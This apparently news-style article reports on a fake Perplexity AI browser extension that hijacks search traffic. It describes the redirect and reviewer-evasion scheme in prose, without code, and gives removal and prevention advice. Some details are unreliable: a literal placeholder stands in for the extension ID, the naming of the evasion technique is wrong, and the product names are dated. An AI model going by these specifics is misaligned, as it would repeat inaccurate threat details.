Microsoft Threat Intelligence issued a critical alert on June 29, 2026, after uncovering a rogue Chromium-based browser extension actively hijacking search traffic on Windows machines. Dubbed “Search for perplexity ai,” the extension impersonates the legitimate AI-powered search platform Perplexity AI, tricking users into installing what appears to be a helpful research tool. Instead, it secretly reroutes search queries through attacker-controlled servers, exposing victims to phishing scams, data theft, and a flood of intrusive advertisements. The discovery underscores the accelerating danger of AI-themed malware as cybercriminals capitalize on the brand recognition of rapidly growing AI services.

A Wolf in AI Clothing: How the Extension Operates

The extension exploits the familiar name and iconography of Perplexity AI to appear authentic in browser app stores. Once installed, it requests excessively broad permissions—access to web page content, browser tabs, and the ability to modify search settings—a red flag most users overlook. With these privileges, the extension intercepts every search query entered in the omnibox and redirects it through a chain of intermediary pages. The final destination is often a counterfeit search engine that injects affiliate links, displays aggressive pop-ups, or captures sensitive information such as login credentials and browsing habits. In some observed cases, the extension injects JavaScript into legitimate result pages to replace sponsored links with attacker-controlled ads, silently siphoning revenue from both users and advertisers.

Why Windows Users Are the Prime Target

While the extension is built for any Chromium-based browser, its primary impact lands on Windows systems, which dominate global desktop market share. Microsoft Edge and Google Chrome, both running the Chromium engine, account for the vast majority of browser usage on Windows, making them a lucrative attack surface. The malware’s focus on search redirection is especially effective on Windows, where default search behavior is often left untouched, and users quickly accept extensions that promise enhanced functionality. Microsoft’s security team noted that the extension was being served through unofficial marketplaces in addition to some approved listings, likely employing technique such as “version flood” updates that add malicious code after passing initial review.

Microsoft’s Rapid Response

Within hours of detection, Microsoft Threat Intelligence integrated protections into Microsoft Defender Antivirus and Microsoft Edge. Users running an up-to-date Defender will see the extension flagged as PUA:Win32/SearchHijacker or a similar designation, and the browser-based SmartScreen filter now blocks the extension’s download domains. For enterprise environments, administrators can find detailed indicators of compromise (IOCs) in the Microsoft 365 Defender portal, including the extension’s unique identifier (ID), installation URLs, and command-and-control server IPs. Microsoft stresses that the threat remains active, and additional variants may surface as the attackers iterate on their social engineering tactics.

The Technical Underpinnings: A Dissected Redirect Scheme

Analysis of the extension’s source code reveals a straightforward but effective redirect infrastructure. A background script loads obfuscated configuration data from a remote server, allowing the attackers to update redirect targets without modifying the extension itself. When a user performs a search on Google, Bing, or even the address bar, the extension checks the URL against a list of known search engine domains. If a match is found, it rewrites the request to pass the query to an intermediary server, which then forwards it to a final landing page filled with ads. All the while, the user sees what appears to be a normal search results page, often with a custom skin mimicking the original search engine’s design.

Deep dives into the network traffic show that some redirect paths lead to well-known advertising syndicates, while others direct users to phishing portals designed to harvest credentials. The extension also employs a technique called “decloaking” — it serves benign content to IP addresses associated with browser stores’ review teams, so the malicious behavior remains hidden during listing approval. This cat-and-mouse game has become a hallmark of browser extension malware, and AI-themed lures add a fresh layer of deception.

Implications for IT Administrators

For Windows IT administrators, this incident is a call to tighten extension policies. Many organizations rely on Group Policy or Microsoft Intune to block all extensions except those explicitly allowlisted. However, phishing emails and drive-by downloads can still trick employees into installing rogue extensions on unmanaged personal devices that sync with corporate accounts. Admins should inspect the list of installed extensions across their fleet using tools like Microsoft Endpoint Manager or third-party inventory solutions. Particular attention should be paid to the extension ID reported by Microsoft: [placeholder—unique extension identifier]. Quick removal steps include navigating to edge://extensions or chrome://extensions, locating the suspicious extension, and clicking “Remove.”

Additionally, enabling Attack Surface Reduction (ASR) rules in Microsoft Defender for Endpoint can prevent the execution of unsigned binaries that often accompany such extensions. Enforcing two-factor authentication and regular security awareness training further reduces the risk that a hijacked search session leads to compromised corporate accounts.

The Bigger Picture: AI Impersonation as a Growing Threat Vector

The “Search for perplexity ai” extension is far from an isolated incident. As AI tools like Perplexity, ChatGPT, and others gain mainstream traction, attackers are quick to exploit their brand equity. Just weeks before this discovery, similar fake extensions targeted Bing Chat and Google Bard, demonstrating a clear trend. Cybercriminals bank on users’ eagerness to adopt the latest AI assistant, combing through official app stores for any listing that appears connected. In many cases, these extensions also carry data-stealing payloads, siphoning cookies and authentication tokens that can be sold on darkweb markets or used for credential stuffing attacks.

This trend highlights a critical weakness in browser extension security models. Despite improvements in review processes, the sheer volume of submissions makes it impossible to catch every malicious actor. Google’s Chrome Web Store and Microsoft’s Edge Add-ons store have both removed the offending extension, but it often reappears under slightly different names and accounts. The anonymous nature of extension development, coupled with the ease of cloning legitimate tools, creates a persistent cat-and-mouse challenge that may require fundamental changes in how browsers handle extensions.

What Users Should Do Right Now

If you suspect the fake Perplexity AI extension has infiltrated your browser, first disconnect from the internet and manually inspect your extensions panel. Look for any entry that references “Perplexity,” especially one named “Search for perplexity ai” or variations. Remove it immediately, then run a full system scan using Windows Defender or a trusted third-party scanner. Clear your browser cache and cookies to eliminate any lingering tracking scripts. Change passwords for accounts accessed during the period the extension was installed, and enable multi-factor authentication wherever possible.

Prevention is equally critical. Before installing any browser extension, scrutinize the developer name, reviews, and permissions. Check how long the developer has been active and whether the extension’s description contains spelling errors or vague language—common hallmarks of counterfeit software. For enterprise users, IT departments should maintain a curated allowlist of approved extensions and deploy security information and event management (SIEM) systems to alert on unauthorized installations.

Microsoft’s Future Mitigation Strategies

Microsoft has signaled that it will leverage artificial intelligence within its own security stack to detect anomalous extension behavior at scale. By analyzing patterns of search redirects, permission requests, and communication with remote servers, machine learning models can flag malicious extensions before they gain significant distribution. The company is also working with browser engine maintainers to propose new extension API limits that would prevent a single extension from intercepting all search traffic without explicit user consent on a per-search basis.

These measures, while promising, take time to implement industry-wide. In the interim, the burden falls on individual users and IT teams to exercise caution. The fusion of AI branding with malware is a potent combination that will only intensify as public fascination with AI continues. Staying ahead requires constant education, robust security tooling, and a healthy dose of skepticism toward browser extensions that seem too good to be true.

Actionable Takeaways

  • Audit browser extensions: Regularly review installed extensions across all profiles. Remove any you don’t recognize or use.
  • Limit permissions: Deny excessive permission requests, especially those asking for access to all website data or the ability to read and change search related settings.
  • Use enterprise controls: Implement group policies to block unknown extensions and enable Microsoft Defender for Endpoint’s web protection features.
  • Verify developer identity: Install extensions only from well-known developers. For AI tools, always navigate to the official website to find a direct download link rather than searching in app stores.
  • Stay informed: Monitor official channels such as the Microsoft Threat Intelligence blog and the MSRC for updates on emerging threats.

This latest outbreak serves as a stark reminder that the very tools designed to streamline our digital lives can become conduits for cybercrime. As AI continues to reshape the technology landscape, users and organizations alike must remain vigilant, adapting their defenses to an ever-evolving threat landscape that now includes fake extensions cloaked in the branding of our most trusted digital assistants.